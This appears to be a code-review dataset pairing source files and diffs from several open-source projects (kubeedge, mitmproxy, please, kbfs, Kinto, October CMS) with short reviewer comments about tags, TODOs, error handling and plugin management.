TLSMqttCAFile sets ca file path // default "/etc/kubeedge/ca/rootCA.crt" TLSMqttCAFile string `json:"tlsMqttCAFile,omitempty"` // TLSMqttCertFile indicates the file containing x509 Certificate for HTTPS // default "/etc/kubeedge/certs/server.crt" TLSMqttCertFile string `json:"tlsMqttCertFile,omitempty"` // TLSMqttPrivateKeyFile indicates the file containing x509 private key matching tlsMqttCertFile // default "/etc/kubeedge/certs/server.key" TLSMqttPrivateKeyFile string `json:"tlsMqttPrivateKeyFile,omitempty"` } // MetaManager indicates the MetaManager module config type MetaManager struct { // Enable indicates whether MetaManager is enabled, // if set to false (for debugging etc.), skip checking other MetaManager configs. // default true Enable bool `json:"enable,omitempty"` // ContextSendGroup indicates send group ContextSendGroup metaconfig.GroupName `json:"contextSendGroup,omitempty"` // ContextSendModule indicates send module ContextSendModule metaconfig.ModuleName `json:"contextSendModule,omitempty"` // PodStatusSyncInterval indicates pod status sync // default 60 PodStatusSyncInterval int32 `json:"podStatusSyncInterval,omitempty"` // RemoteQueryTimeout indicates remote query timeout (second) // default 60 RemoteQueryTimeout int32 `json:"remoteQueryTimeout,omitempty"` } // ServiceBus indicates the ServiceBus module config type ServiceBus struct { // Enable indicates whether ServiceBus is enabled, // if set to false (for debugging etc.), skip checking other ServiceBus configs. // default false Enable bool `json:"enable"` } // DeviceTwin indicates the DeviceTwin module config type DeviceTwin struct { // Enable indicates whether DeviceTwin is enabled, // if set to false (for debugging etc.), skip checking other DeviceTwin configs. // default true Enable bool `json:"enable,omitempty"` } // DBTest indicates the DBTest module config type DBTest struct { // Enable indicates whether DBTest is enabled, // if set to false (for debugging etc.), skip checking other DBTest configs. // default false Enable bool `json:"enable"` } // EdgeMesh indicates the EdgeMesh module config type EdgeMesh struct { // Enable indicates whether EdgeMesh is enabled, // if set to false (for debugging etc.), skip checking other EdgeMesh configs. // default true Enable bool `json:"enable,omitempty"` // lbStrategy indicates load balance strategy name // default "RoundRobin" LBStrategy string `json:"lbStrategy,omitempty"` // ListenInterface indicates the listen interface of EdgeMesh // default "docker0" ListenInterface string `json:"listenInterface,omitempty"` // SubNet indicates the subnet of EdgeMesh // default "9.251.0.0/16" SubNet string `json:"subNet,omitempty"` // ListenPort indicates the listen port of EdgeMesh // default 40001 ListenPort int `json:"listenPort,omitempty"` } // EdgeSream indicates the stream controller type EdgeStream struct { // Enable indicates whether edgestream is enabled, if set to false (for debugging etc.), skip checking other configs. // default true Enable bool `json:"enable"` // TLSTunnelCAFile indicates ca file path // default /etc/kubeedge/ca/rootCA.crt TLSTunnelCAFile string `json:"tlsTunnelCAFile,omitempty"` // TLSTunnelCertFile indicates the file containing x509 Certificate for HTTPS // default /etc/kubeedge/certs/server.crt TLSTunnelCertFile string `json:"tlsTunnelCertFile,omitempty"` // TLSTunnelPrivateKeyFile indicates the file containing x509 private key matching tlsCertFile // default /etc/kubeedge/certs/server.key TLSTunnelPrivateKeyFile string `json:"tlsTunnelPrivateKeyFile,omitempty"` // HandshakeTimeout indicates handshake timeout (second) // default 30 HandshakeTimeout int32 `json:"handshakeTimeout,omitempty"` // ReadDeadline indicates read dead line (second) // default 15 ReadDeadline int32 `json:"readDeadline,omitempty"` // TunnelServer indicates websocket server address (ip:port) // +Required TunnelServer string `json:"server,omitempty"` // WriteDeadline indicates write dead line (second) // default 15 WriteDeadline int32 `json:"writeDeadline,omitempty"` }
1
20,507
We'd better add the `json:"metaServer,omitempty"` here
kubeedge-kubeedge
go
@@ -0,0 +1,17 @@ +#!/usr/bin/env python3 +import platform +import sys +from pathlib import Path +from subprocess import check_call + +here = Path(__file__).parent + +pip_install = [ + sys.executable, "-m", + "pip", + "install", + "--disable-pip-version-check", +] + +check_call([*pip_install, "--require-hashes", "-r", f"requirements-{platform.system().lower()}.txt"], cwd=here) +check_call([*pip_install, "--no-deps", "-e", "../.."], cwd=here)
1
1
15,677
So... when we want to install mitmproxy with pinned dependencies, we first install all pinned dependencies, and then in a second step install mitmproxy as editable, making sure that no additional dependencies are sneaking in.
mitmproxy-mitmproxy
py
@@ -68,7 +68,10 @@ func Sandbox(args []string) error { } } err = syscall.Exec(cmd, args, env) - return fmt.Errorf("Failed to exec %s: %s", cmd, err) + if err != nil { + return fmt.Errorf("Failed to exec %s: %s", cmd, err) + } + return nil } func rewriteEnvVars(env []string, from, to string) {
1
//go:build linux // +build linux package sandbox import ( "fmt" "os" "os/exec" "strings" "syscall" "golang.org/x/sys/unix" "github.com/thought-machine/please/src/core" ) // mdLazytime is the bit for lazily flushing disk writes. // TODO(jpoole): find out if there's a reason this isn't in syscall const mdLazytime = 1 << 25 const sandboxDirsVar = "SANDBOX_DIRS" var sandboxMountDir = core.SandboxDir func Sandbox(args []string) error { if len(args) < 2 { return fmt.Errorf("incorrect number of args to call plz sandbox") } env := os.Environ() cmd, err := exec.LookPath(args[0]) if err != nil { return fmt.Errorf("Failed to lookup %s on path: %s", args[0], err) } unshareMount := os.Getenv("SHARE_MOUNT") != "1" unshareNetwork := os.Getenv("SHARE_NETWORK") != "1" if unshareMount { tmpDirEnv := os.Getenv("TMP_DIR") if tmpDirEnv == "" { return fmt.Errorf("$TMP_DIR is not set but required. It must contain the directory path to be sandboxed") } if err := sandboxDir(tmpDirEnv); err != nil { return err } if err := mountSandboxDirs(); err != nil { return fmt.Errorf("Failed to mount over sandboxed dirs: %w", err) } rewriteEnvVars(env, tmpDirEnv, sandboxMountDir) if err := os.Chdir(sandboxMountDir); err != nil { return fmt.Errorf("Failed to chdir to %s: %s", sandboxMountDir, err) } if err := mountProc(); err != nil { return err } } if unshareNetwork { if err := loUp(); err != nil { return fmt.Errorf("Failed to bring loopback interface up: %s", err) } } err = syscall.Exec(cmd, args, env) return fmt.Errorf("Failed to exec %s: %s", cmd, err) } func rewriteEnvVars(env []string, from, to string) { for i, envVar := range env { if strings.Contains(envVar, from) { parts := strings.Split(envVar, "=") key := parts[0] value := strings.TrimPrefix(envVar, key+"=") env[i] = key + "=" + strings.ReplaceAll(value, from, to) } } } func sandboxDir(dir string) error { if strings.HasPrefix(dir, "/tmp") { return fmt.Errorf("Not mounting /tmp as %s is a subdir", dir) } // Remounting / as private is necessary so that the tmpfs mount isn't visible to anyone else. if err := syscall.Mount("", "/", "", syscall.MS_REC|syscall.MS_PRIVATE, ""); err != nil { return fmt.Errorf("Failed to mount root: %w", err) } flags := mdLazytime | syscall.MS_NOATIME | syscall.MS_NODEV | syscall.MS_NOSUID if err := syscall.Mount("", "/tmp", "tmpfs", uintptr(flags), ""); err != nil { return fmt.Errorf("Failed to mount /tmp: %w", err) } if err := os.Setenv("TMPDIR", "/tmp"); err != nil { return fmt.Errorf("Failed to set $TMPDIR: %w", err) } if err := os.Mkdir(sandboxMountDir, os.ModeDir|0775); err != nil { return fmt.Errorf("Failed to make %s: %w", sandboxMountDir, err) } if err := syscall.Mount(dir, sandboxMountDir, "", syscall.MS_BIND, ""); err != nil { return fmt.Errorf("Failed to bind %s to %s : %w", dir, sandboxMountDir, err) } if err := syscall.Mount("", "/", "", syscall.MS_REMOUNT|syscall.MS_RDONLY|syscall.MS_BIND, ""); err != nil { return fmt.Errorf("Failed to remount root as readonly: %w", err) } return nil } func mountProc() error { if err := syscall.Mount("proc", "/proc", "proc", 0, ""); err != nil { return fmt.Errorf("Failed to mount /proc: %w", err) } return nil } func mountSandboxDirs() error { dirs := strings.Split(os.Getenv(sandboxDirsVar), ",") for _, d := range dirs { if d == "" { continue } if err := syscall.Mount("", d, "tmpfs", mdLazytime|syscall.MS_NOATIME|syscall.MS_NODEV|syscall.MS_NOSUID, ""); err != nil { return fmt.Errorf("Failed to mount sandbox dir %s: %w", d, err) } } return os.Unsetenv(sandboxDirsVar) } // loUp brings up the loopback network interface. func loUp() error { sock, err := unix.Socket(unix.AF_INET, unix.SOCK_DGRAM, 0) if err != nil { return err } defer unix.Close(sock) ifreq, err := unix.NewIfreq("lo") if err != nil { return err } if err := unix.IoctlIfreq(sock, unix.SIOCGIFFLAGS, ifreq); err != nil { return err } ifreq.SetUint32(ifreq.Uint32() | unix.IFF_UP) return unix.IoctlIfreq(sock, unix.SIOCSIFFLAGS, ifreq) }
1
10,445
not sure how this got in master, but the linter is unhappy about it so I fixed it here
thought-machine-please
go
@@ -15,3 +15,8 @@ const rekeyRecheckInterval = 30 * time.Second // rekeyInitialTTL is the maximum number rechecks each rekey request can trigger. const rekeyInitialTTL = 4 + +// mdserverReconnectBackoffWindow is a backoff window within which we try to +// wait randomly for before reconnecting to MD server. +// TODO: increase this to 5 min +const mdserverReconnectBackoffWindow = 5 * time.Minute
1
// Copyright 2017 Keybase Inc. All rights reserved. // Use of this source code is governed by a BSD // license that can be found in the LICENSE file. package libkbfs import "time" // RPCReconnectInterval specifies the time between reconnect attempts for RPC Connections. const RPCReconnectInterval = 2 * time.Second // rekeyRecheckInterval is the time duration to wait for before rechecking for // rekey for the same TLF. See fbo.Rekey for more details. const rekeyRecheckInterval = 30 * time.Second // rekeyInitialTTL is the maximum number rechecks each rekey request can trigger. const rekeyInitialTTL = 4
1
16,874
No need for this TODO anymore, right?
keybase-kbfs
go
@@ -47,7 +47,8 @@ def main(global_config, config=None, **settings): # In Kinto API 1.x, a default bucket is available. # Force its inclusion if not specified in settings. - if 'kinto.plugins.default_bucket' not in settings['includes']: + if 'kinto.plugins.default_bucket' not in settings['includes'] \ + and 'kinto.plugins.default_bucket' not in settings['excludes']: config.include('kinto.plugins.default_bucket') # Retro-compatibility with first Kinto clients.
1
import pkg_resources import logging import cliquet from pyramid.config import Configurator from pyramid.settings import asbool from pyramid.security import Authenticated from kinto.authorization import RouteFactory # Module version, as defined in PEP-0396. __version__ = pkg_resources.get_distribution(__package__).version # Implemented HTTP API Version HTTP_API_VERSION = '1.4' # Main kinto logger logger = logging.getLogger(__name__) DEFAULT_SETTINGS = { 'retry_after_seconds': 3, 'cache_backend': 'cliquet.cache.memory', 'permission_backend': 'cliquet.permission.memory', 'storage_backend': 'cliquet.storage.memory', 'project_docs': 'https://kinto.readthedocs.org/', 'bucket_create_principals': Authenticated, 'multiauth.authorization_policy': ( 'kinto.authorization.AuthorizationPolicy'), 'experimental_collection_schema_validation': 'False', 'http_api_version': HTTP_API_VERSION } def main(global_config, config=None, **settings): if not config: config = Configurator(settings=settings, root_factory=RouteFactory) # Force project name, since it determines settings prefix. config.add_settings({'cliquet.project_name': 'kinto'}) cliquet.initialize(config, version=__version__, default_settings=DEFAULT_SETTINGS) settings = config.get_settings() # In Kinto API 1.x, a default bucket is available. # Force its inclusion if not specified in settings. if 'kinto.plugins.default_bucket' not in settings['includes']: config.include('kinto.plugins.default_bucket') # Retro-compatibility with first Kinto clients. config.registry.public_settings.add('cliquet.batch_max_requests') # Expose capability schema_enabled = asbool( settings['experimental_collection_schema_validation'] ) if schema_enabled: config.add_api_capability( "schema", description="Validates collection records with JSON schemas.", url="http://kinto.readthedocs.org/en/latest/api/1.x/" "collections.html#collection-json-schema") # Scan Kinto views. kwargs = {} flush_enabled = asbool(settings.get('flush_endpoint_enabled')) if not flush_enabled: kwargs['ignore'] = 'kinto.views.flush' config.scan("kinto.views", **kwargs) app = config.make_wsgi_app() # Install middleware (idempotent if disabled) return cliquet.install_middlewares(app, settings)
1
8,921
I would assign the key you're looking for into a variable first, and then use it in the comparisons.
Kinto-kinto
py
@@ -855,6 +855,9 @@ class PluginManager if ($pluginPath = self::instance()->getPluginPath($id)) { File::deleteDirectory($pluginPath); } + + // actually remove the plugin from our internal container + unset($this->plugins[ $this->normalizeIdentifier($id) ]); } /**
1
<?php namespace System\Classes; use Db; use App; use Str; use Log; use File; use Lang; use View; use Config; use Schema; use SystemException; use RecursiveIteratorIterator; use RecursiveDirectoryIterator; /** * Plugin manager * * @package october\system * @author Alexey Bobkov, Samuel Georges */ class PluginManager { use \October\Rain\Support\Traits\Singleton; /** * The application instance, since Plugins are an extension of a Service Provider */ protected $app; /** * @var array Container array used for storing plugin information objects. */ protected $plugins; /** * @var array A map of plugins and their directory paths. */ protected $pathMap = []; /** * @var array A map of normalized plugin identifiers [lowercase.identifier => Normalized.Identifier] */ protected $normalizedMap = []; /** * @var bool Flag to indicate that all plugins have had the register() method called by registerAll() being called on this class. */ protected $registered = false; /** * @var bool Flag to indicate that all plugins have had the boot() method called by bootAll() being called on this class. */ protected $booted = false; /** * @var string Path to the JSON encoded file containing the disabled plugins. */ protected $metaFile; /** * @var array Array of disabled plugins */ protected $disabledPlugins = []; /** * @var array Cache of registration method results. */ protected $registrationMethodCache = []; /** * @var bool Prevent all plugins from registering or booting */ public static $noInit = false; /** * Initializes the plugin manager */ protected function init() { $this->bindContainerObjects(); $this->metaFile = storage_path('cms/disabled.json'); $this->loadDisabled(); $this->loadPlugins(); if ($this->app->runningInBackend()) { $this->loadDependencies(); } } /** * These objects are "soft singletons" and may be lost when * the IoC container reboots. This provides a way to rebuild * for the purposes of unit testing. */ public function bindContainerObjects() { $this->app = App::make('app'); } /** * Finds all available plugins and loads them in to the $this->plugins array. * * @return array */ public function loadPlugins() { $this->plugins = []; /** * Locate all plugins and binds them to the container */ foreach ($this->getPluginNamespaces() as $namespace => $path) { $this->loadPlugin($namespace, $path); } $this->sortDependencies(); return $this->plugins; } /** * Loads a single plugin into the manager. * * @param string $namespace Eg: Acme\Blog * @param string $path Eg: plugins_path().'/acme/blog'; * @return void */ public function loadPlugin($namespace, $path) { $className = $namespace . '\Plugin'; $classPath = $path . '/Plugin.php'; try { // Autoloader failed? if (!class_exists($className)) { include_once $classPath; } // Not a valid plugin! if (!class_exists($className)) { return; } $classObj = new $className($this->app); } catch (\Throwable $e) { Log::error('Plugin ' . $className . ' could not be instantiated.', [ 'message' => $e->getMessage(), 'file' => $e->getFile(), 'line' => $e->getLine(), 'trace' => $e->getTraceAsString() ]); return; } $classId = $this->getIdentifier($classObj); /* * Check for disabled plugins */ if ($this->isDisabled($classId)) { $classObj->disabled = true; } $this->plugins[$classId] = $classObj; $this->pathMap[$classId] = $path; $this->normalizedMap[strtolower($classId)] = $classId; return $classObj; } /** * Runs the register() method on all plugins. Can only be called once. * * @param bool $force Defaults to false, if true will force the re-registration of all plugins. Use unregisterAll() instead. * @return void */ public function registerAll($force = false) { if ($this->registered && !$force) { return; } foreach ($this->plugins as $pluginId => $plugin) { $this->registerPlugin($plugin, $pluginId); } $this->registered = true; } /** * Unregisters all plugins: the inverse of registerAll(). * * @return void */ public function unregisterAll() { $this->registered = false; $this->plugins = []; } /** * Registers a single plugin object. * * @param PluginBase $plugin The instantiated Plugin object * @param string $pluginId The string identifier for the plugin * @return void */ public function registerPlugin($plugin, $pluginId = null) { if (!$pluginId) { $pluginId = $this->getIdentifier($plugin); } $pluginPath = $this->getPluginPath($plugin); $pluginNamespace = strtolower($pluginId); /* * Register language namespaces */ $langPath = $pluginPath . '/lang'; if (File::isDirectory($langPath)) { Lang::addNamespace($pluginNamespace, $langPath); } /** * Prevent autoloaders from loading if plugin is disabled */ if ($plugin->disabled) { return; } /* * Register plugin class autoloaders */ $autoloadPath = $pluginPath . '/vendor/autoload.php'; if (File::isFile($autoloadPath)) { ComposerManager::instance()->autoload($pluginPath . '/vendor'); } /* * Register configuration path */ $configPath = $pluginPath . '/config'; if (File::isDirectory($configPath)) { Config::package($pluginNamespace, $configPath, $pluginNamespace); } /* * Register views path */ $viewsPath = $pluginPath . '/views'; if (File::isDirectory($viewsPath)) { View::addNamespace($pluginNamespace, $viewsPath); } /** * Disable plugin registration for restricted pages, unless elevated */ if (self::$noInit && !$plugin->elevated) { return; } /** * Run the plugin's register() method */ $plugin->register(); /* * Add init, if available */ $initFile = $pluginPath . '/init.php'; if (File::exists($initFile)) { require $initFile; } /* * Add routes, if available */ $routesFile = $pluginPath . '/routes.php'; if (File::exists($routesFile)) { require $routesFile; } } /** * Runs the boot() method on all plugins. Can only be called once. * * @param bool $force Defaults to false, if true will force the re-booting of all plugins * @return void */ public function bootAll($force = false) { if ($this->booted && !$force) { return; } foreach ($this->plugins as $plugin) { $this->bootPlugin($plugin); } $this->booted = true; } /** * Boots the provided plugin object. * * @param PluginBase $plugin * @return void */ public function bootPlugin($plugin) { if (!$plugin || $plugin->disabled || (self::$noInit && !$plugin->elevated)) { return; } $plugin->boot(); } /** * Returns the directory path to a plugin * * @param PluginBase|string $id The plugin to get the path for * @return string|null */ public function getPluginPath($id) { $classId = $this->getIdentifier($id); if (!isset($this->pathMap[$classId])) { return null; } return File::normalizePath($this->pathMap[$classId]); } /** * Check if a plugin exists and is enabled. * * @param string $id Plugin identifier, eg: Namespace.PluginName * @return bool */ public function exists($id) { return $this->findByIdentifier($id) && !$this->isDisabled($id); } /** * Returns an array with all enabled plugins * * @return array [$code => $pluginObj] */ public function getPlugins() { return array_diff_key($this->plugins, $this->disabledPlugins); } /** * Returns an array will all plugins detected on the filesystem * * @return array [$code => $pluginObj] */ public function getAllPlugins() { return $this->plugins; } /** * Returns a plugin registration class based on its namespace (Author\Plugin). * * @param string $namespace * @return PluginBase|null */ public function findByNamespace($namespace) { $identifier = $this->getIdentifier($namespace); return $this->plugins[$identifier] ?? null; } /** * Returns a plugin registration class based on its identifier (Author.Plugin). * * @param string|PluginBase $identifier * @return PluginBase|null */ public function findByIdentifier($identifier) { if (!isset($this->plugins[$identifier])) { $code = $this->getIdentifier($identifier); $identifier = $this->normalizeIdentifier($code); } return $this->plugins[$identifier] ?? null; } /** * Checks to see if a plugin has been registered. * * @param string|PluginBase * @return bool */ public function hasPlugin($namespace) { $classId = $this->getIdentifier($namespace); $normalized = $this->normalizeIdentifier($classId); return isset($this->plugins[$normalized]); } /** * Returns a flat array of vendor plugin namespaces and their paths * * @return array ['Author\Plugin' => 'plugins/author/plugin'] */ public function getPluginNamespaces() { $classNames = []; foreach ($this->getVendorAndPluginNames() as $vendorName => $vendorList) { foreach ($vendorList as $pluginName => $pluginPath) { $namespace = '\\'.$vendorName.'\\'.$pluginName; $namespace = Str::normalizeClassName($namespace); $classNames[$namespace] = $pluginPath; } } return $classNames; } /** * Returns a 2 dimensional array of vendors and their plugins. * * @return array ['vendor' => ['author' => 'plugins/author/plugin']] */ public function getVendorAndPluginNames() { $plugins = []; $dirPath = plugins_path(); if (!File::isDirectory($dirPath)) { return $plugins; } $it = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($dirPath, RecursiveDirectoryIterator::FOLLOW_SYMLINKS) ); $it->setMaxDepth(2); $it->rewind(); while ($it->valid()) { if (($it->getDepth() > 1) && $it->isFile() && (strtolower($it->getFilename()) == "plugin.php")) { $filePath = dirname($it->getPathname()); $pluginName = basename($filePath); $vendorName = basename(dirname($filePath)); $plugins[$vendorName][$pluginName] = $filePath; } $it->next(); } return $plugins; } /** * Resolves a plugin identifier (Author.Plugin) from a plugin class name or object. * * @param mixed Plugin class name or object * @return string Identifier in format of Author.Plugin */ public function getIdentifier($namespace) { $namespace = Str::normalizeClassName($namespace); if (strpos($namespace, '\\') === null) { return $namespace; } $parts = explode('\\', $namespace); $slice = array_slice($parts, 1, 2); $namespace = implode('.', $slice); return $namespace; } /** * Takes a human plugin code (acme.blog) and makes it authentic (Acme.Blog) * Returns the provided identifier if a match isn't found * * @param string $identifier * @return string */ public function normalizeIdentifier($identifier) { $id = strtolower($identifier); if (isset($this->normalizedMap[$id])) { return $this->normalizedMap[$id]; } return $identifier; } /** * Spins over every plugin object and collects the results of a method call. Results are cached in memory. * * @param string $methodName * @return array */ public function getRegistrationMethodValues($methodName) { if (isset($this->registrationMethodCache[$methodName])) { return $this->registrationMethodCache[$methodName]; } $results = []; $plugins = $this->getPlugins(); foreach ($plugins as $id => $plugin) { if (!method_exists($plugin, $methodName)) { continue; } $results[$id] = $plugin->{$methodName}(); } return $this->registrationMethodCache[$methodName] = $results; } // // Disability // /** * Clears the disabled plugins cache file * * @return void */ public function clearDisabledCache() { File::delete($this->metaFile); $this->disabledPlugins = []; } /** * Loads all disabled plugins from the cached JSON file. * * @return void */ protected function loadDisabled() { $path = $this->metaFile; if (($configDisabled = Config::get('cms.disablePlugins')) && is_array($configDisabled)) { foreach ($configDisabled as $disabled) { $this->disabledPlugins[$disabled] = true; } } if (File::exists($path)) { $disabled = json_decode(File::get($path), true) ?: []; $this->disabledPlugins = array_merge($this->disabledPlugins, $disabled); } else { $this->populateDisabledPluginsFromDb(); $this->writeDisabled(); } } /** * Determines if a plugin is disabled by looking at the meta information * or the application configuration. * * @param string|PluginBase $id * @return bool */ public function isDisabled($id) { $code = $this->getIdentifier($id); $normalized = $this->normalizeIdentifier($code); return isset($this->disabledPlugins[$normalized]); } /** * Write the disabled plugins to a meta file. * * @return void */ protected function writeDisabled() { File::put($this->metaFile, json_encode($this->disabledPlugins)); } /** * Populates information about disabled plugins from database * * @return void */ protected function populateDisabledPluginsFromDb() { if (!App::hasDatabase()) { return; } if (!Schema::hasTable('system_plugin_versions')) { return; } $disabled = Db::table('system_plugin_versions')->where('is_disabled', 1)->lists('code'); foreach ($disabled as $code) { $this->disabledPlugins[$code] = true; } } /** * Disables a single plugin in the system. * * @param string|PluginBase $id Plugin code/namespace * @param bool $isUser Set to true if disabled by the user, false by default * @return bool Returns false if the plugin was already disabled, true otherwise */ public function disablePlugin($id, $isUser = false) { $code = $this->getIdentifier($id); $code = $this->normalizeIdentifier($code); if (isset($this->disabledPlugins[$code])) { return false; } $this->disabledPlugins[$code] = $isUser; $this->writeDisabled(); if ($pluginObj = $this->findByIdentifier($code)) { $pluginObj->disabled = true; } return true; } /** * Enables a single plugin in the system. * * @param string|PluginBase $id Plugin code/namespace * @param bool $isUser Set to true if enabled by the user, false by default * @return bool Returns false if the plugin wasn't already disabled or if the user disabled a plugin that the system is trying to re-enable, true otherwise */ public function enablePlugin($id, $isUser = false) { $code = $this->getIdentifier($id); $code = $this->normalizeIdentifier($code); if (!isset($this->disabledPlugins[$code])) { return false; } // Prevent system from enabling plugins disabled by the user if (!$isUser && $this->disabledPlugins[$code] === true) { return false; } unset($this->disabledPlugins[$code]); $this->writeDisabled(); if ($pluginObj = $this->findByIdentifier($code)) { $pluginObj->disabled = false; } return true; } // // Dependencies // /** * Scans the system plugins to locate any dependencies that are not currently * installed. Returns an array of missing plugin codes keyed by the plugin that requires them. * * ['Author.Plugin' => ['Required.Plugin1', 'Required.Plugin2'] * * PluginManager::instance()->findMissingDependencies(); * * @return array */ public function findMissingDependencies() { $missing = []; foreach ($this->plugins as $id => $plugin) { if (!$required = $this->getDependencies($plugin)) { continue; } foreach ($required as $require) { if ($this->hasPlugin($require)) { continue; } if (!in_array($require, $missing)) { $missing[$this->getIdentifier($plugin)][] = $require; } } } return $missing; } /** * Cross checks all plugins and their dependancies, if not met plugins * are disabled and vice versa. * * @return void */ protected function loadDependencies() { foreach ($this->plugins as $id => $plugin) { if (!$required = $this->getDependencies($plugin)) { continue; } $disable = false; foreach ($required as $require) { if (!$pluginObj = $this->findByIdentifier($require)) { $disable = true; } elseif ($pluginObj->disabled) { $disable = true; } } if ($disable) { $this->disablePlugin($id); } else { $this->enablePlugin($id); } } } /** * Sorts a collection of plugins, in the order that they should be actioned, * according to their given dependencies. Least dependent come first. * * @return array Array of sorted plugin identifiers and instantiated classes ['Author.Plugin' => PluginBase] * @throws SystemException If a possible circular dependency is detected */ protected function sortDependencies() { ksort($this->plugins); /* * Canvas the dependency tree */ $checklist = $this->plugins; $result = []; $loopCount = 0; while (count($checklist)) { if (++$loopCount > 2048) { throw new SystemException('Too much recursion! Check for circular dependencies in your plugins.'); } foreach ($checklist as $code => $plugin) { /* * Get dependencies and remove any aliens */ $depends = $this->getDependencies($plugin); $depends = array_filter($depends, function ($pluginCode) { return isset($this->plugins[$pluginCode]); }); /* * No dependencies */ if (!$depends) { array_push($result, $code); unset($checklist[$code]); continue; } /* * Find dependencies that have not been checked */ $depends = array_diff($depends, $result); if (count($depends) > 0) { continue; } /* * All dependencies are checked */ array_push($result, $code); unset($checklist[$code]); } } /* * Reassemble plugin map */ $sortedPlugins = []; foreach ($result as $code) { $sortedPlugins[$code] = $this->plugins[$code]; } return $this->plugins = $sortedPlugins; } /** * Returns the plugin identifiers that are required by the supplied plugin. * * @param string $plugin Plugin identifier, object or class * @return array */ public function getDependencies($plugin) { if (is_string($plugin) && (!$plugin = $this->findByIdentifier($plugin))) { return []; } if (!isset($plugin->require) || !$plugin->require) { return []; } return is_array($plugin->require) ? $plugin->require : [$plugin->require]; } /** * @deprecated Plugins are now sorted by default. See getPlugins() * Remove if year >= 2022 */ public function sortByDependencies($plugins = null) { traceLog('PluginManager::sortByDependencies is deprecated. Plugins are now sorted by default. Use PluginManager::getPlugins()'); return array_keys($plugins ?: $this->getPlugins()); } // // Management // /** * Completely roll back and delete a plugin from the system. * * @param string $id Plugin code/namespace * @return void */ public function deletePlugin($id) { /* * Rollback plugin */ UpdateManager::instance()->rollbackPlugin($id); /* * Delete from file system */ if ($pluginPath = self::instance()->getPluginPath($id)) { File::deleteDirectory($pluginPath); } } /** * Tears down a plugin's database tables and rebuilds them. * * @param string $id Plugin code/namespace * @return void */ public function refreshPlugin($id) { $manager = UpdateManager::instance(); $manager->rollbackPlugin($id); $manager->updatePlugin($id); } }
1
19,041
Would be better to normalize it at the start of the method to pass through to all the other calls
octobercms-october
php
@@ -167,6 +167,7 @@ class CodeEditor extends FormWidgetBase $this->vars['highlightActiveLine'] = $this->highlightActiveLine; $this->vars['useSoftTabs'] = $this->useSoftTabs; $this->vars['showGutter'] = $this->showGutter; + $this->vars['safeMode'] = $this->parentForm->model->isSafeMode(); $this->vars['language'] = $this->language; $this->vars['margin'] = $this->margin; $this->vars['stretch'] = $this->formField->stretch;
1
<?php namespace Backend\FormWidgets; use Backend\Models\Preference as BackendPreference; use Backend\Classes\FormWidgetBase; /** * Code Editor * Renders a code editor field. * * @package october\backend * @author Alexey Bobkov, Samuel Georges */ class CodeEditor extends FormWidgetBase { // // Configurable properties // /** * @var string Code language to display (php, twig) */ public $language = 'php'; /** * @var boolean Determines whether the gutter is visible. */ public $showGutter = true; /** * @var boolean Indicates whether the the word wrapping is enabled. */ public $wordWrap = true; /** * @var string Cold folding mode: manual, markbegin, markbeginend. */ public $codeFolding = 'manual'; /** * @var boolean Automatically close tags and special characters, * like quotation marks, parenthesis, or brackets. */ public $autoClosing = true; /** * @var boolean Indicates whether the the editor uses spaces for indentation. */ public $useSoftTabs = true; /** * @var boolean Sets the size of the indentation. */ public $tabSize = 4; /** * @var integer Sets the font size. */ public $fontSize = 12; /** * @var integer Sets the editor margin size. */ public $margin = 0; /** * @var string Ace Editor theme to use. */ public $theme = 'twilight'; /** * @var bool Show invisible characters. */ public $showInvisibles = false; /** * @var bool Highlight the active line. */ public $highlightActiveLine = true; /** * @var boolean If true, the editor is set to read-only mode */ public $readOnly = false; /** * @var string Autocomplete mode: manual, basic, live. */ public $autocompletion = 'manual'; /** * @var boolean If true, the editor activate use Snippets */ public $enableSnippets = true; /** * @var boolean If true, the editor show Indent Guides */ public $displayIndentGuides = true; /** * @var boolean If true, the editor show Print Margin */ public $showPrintMargin = false; // // Object properties // /** * @inheritDoc */ protected $defaultAlias = 'codeeditor'; /** * @inheritDoc */ public function init() { $this->applyEditorPreferences(); if ($this->formField->disabled) { $this->readOnly = true; } $this->fillFromConfig([ 'language', 'showGutter', 'wordWrap', 'codeFolding', 'autoClosing', 'useSoftTabs', 'tabSize', 'fontSize', 'margin', 'theme', 'showInvisibles', 'highlightActiveLine', 'readOnly', 'autocompletion', 'enableSnippets', 'displayIndentGuides', 'showPrintMargin' ]); } /** * @inheritDoc */ public function render() { $this->prepareVars(); return $this->makePartial('codeeditor'); } /** * Prepares the widget data */ public function prepareVars() { $this->vars['fontSize'] = $this->fontSize; $this->vars['wordWrap'] = $this->wordWrap; $this->vars['codeFolding'] = $this->codeFolding; $this->vars['autoClosing'] = $this->autoClosing; $this->vars['tabSize'] = $this->tabSize; $this->vars['theme'] = $this->theme; $this->vars['showInvisibles'] = $this->showInvisibles; $this->vars['highlightActiveLine'] = $this->highlightActiveLine; $this->vars['useSoftTabs'] = $this->useSoftTabs; $this->vars['showGutter'] = $this->showGutter; $this->vars['language'] = $this->language; $this->vars['margin'] = $this->margin; $this->vars['stretch'] = $this->formField->stretch; $this->vars['size'] = $this->formField->size; $this->vars['readOnly'] = $this->readOnly; $this->vars['autocompletion'] = $this->autocompletion; $this->vars['enableSnippets'] = $this->enableSnippets; $this->vars['displayIndentGuides'] = $this->displayIndentGuides; $this->vars['showPrintMargin'] = $this->showPrintMargin; // Double encode when escaping $this->vars['value'] = htmlentities($this->getLoadValue(), ENT_QUOTES, 'UTF-8', true); $this->vars['name'] = $this->getFieldName(); } /** * @inheritDoc */ protected function loadAssets() { $this->addCss('css/codeeditor.css', 'core'); $this->addJs('js/build-min.js', 'core'); } /** * Looks at the user preferences and overrides any set values. * @return void */ protected function applyEditorPreferences() { // Load the editor system settings $preferences = BackendPreference::instance(); $this->fontSize = $preferences->editor_font_size; $this->wordWrap = $preferences->editor_word_wrap; $this->codeFolding = $preferences->editor_code_folding; $this->autoClosing = $preferences->editor_auto_closing; $this->tabSize = $preferences->editor_tab_size; $this->theme = $preferences->editor_theme; $this->showInvisibles = $preferences->editor_show_invisibles; $this->highlightActiveLine = $preferences->editor_highlight_active_line; $this->useSoftTabs = !$preferences->editor_use_hard_tabs; $this->showGutter = $preferences->editor_show_gutter; $this->autocompletion = $preferences->editor_autocompletion; $this->enableSnippets = $preferences->editor_enable_snippets; $this->displayIndentGuides = $preferences->editor_display_indent_guides; $this->showPrintMargin = $preferences->editor_show_print_margin; } }
1
17,406
